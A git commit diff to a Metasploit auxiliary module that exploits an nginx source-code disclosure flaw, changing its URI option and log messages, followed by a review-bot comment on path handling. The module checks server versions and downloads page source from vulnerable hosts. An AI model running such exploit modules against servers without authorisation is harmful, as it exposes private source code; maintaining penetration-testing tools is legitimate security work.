Fix nginx_source_disclosure for full_uri

William Vu 2015-11-25 11:19:27 -06:00
parent 035882702a
commit 7d17c5741b
1 changed files with 8 additions and 17 deletions


@ -35,22 +35,13 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']), OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']), OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
], self.class) ], self.class)
end end
def target_url
uri = normalize_uri(datastore['URI'])
proto = 'http'
if rport == 443 || ssl
proto = 'https'
end
"#{proto}://#{vhost}:#{rport}#{uri}"
end
def run_host(ip) def run_host(ip)
uri = normalize_uri(datastore['URI']) uri = normalize_uri(target_uri.path)
path_save = datastore['PATH_SAVE'] path_save = datastore['PATH_SAVE']
vuln_versions = [ vuln_versions = [
@ -74,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25) }, 25)
if res.nil? if res.nil?
print_error("#{target_url} - nginx - Connection timed out") print_error("#{full_uri} - nginx - Connection timed out")
return return
else else
version = res.headers['Server'] version = res.headers['Server']
@ -82,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
end end
if vuln_versions.include?(version) if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}") print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
if (res and res.code == 200) if (res and res.code == 200)
print_good("#{target_url} - nginx - Getting the source of page #{uri}") print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
save_source = File.new("#{path_save}#{uri}","w") save_source = File.new("#{path_save}#{uri}","w")
save_source.puts(res.body.to_s) save_source.puts(res.body.to_s)
save_source.close save_source.close
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}")) print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
else else
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response") print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
@ -102,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
else else
if version =~ /nginx/ if version =~ /nginx/
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}") print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
else else
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix") print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
end end
return return
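Review bot: The local save path in run_host is still built by plain concatenation, `File.new("#{path_save}#{uri}","w")`, and `uri` now comes from `target_uri.path`, so any directory components in TARGETURI are carried straight into the path written on the operator's disk. Whether `normalize_uri` strips `..` segments is not visible here, so it would be safer to confine the write to PATH_SAVE, for example `File.open(File.join(path_save, File.basename(uri)), 'w') { |f| f.puts(res.body.to_s) }`, which also closes the handle if the write raises; the "File successfully saved" message should then print that same joined path. Separately, the `Unrecognized #{res.code} response` message keeps the hard-coded `"http://#{vhost}:#{rport}"` prefix, which mislabels SSL targets, and should use `full_uri` like the other messages this commit converts. run_host starts in the first hunk and its end lies outside the visible lines.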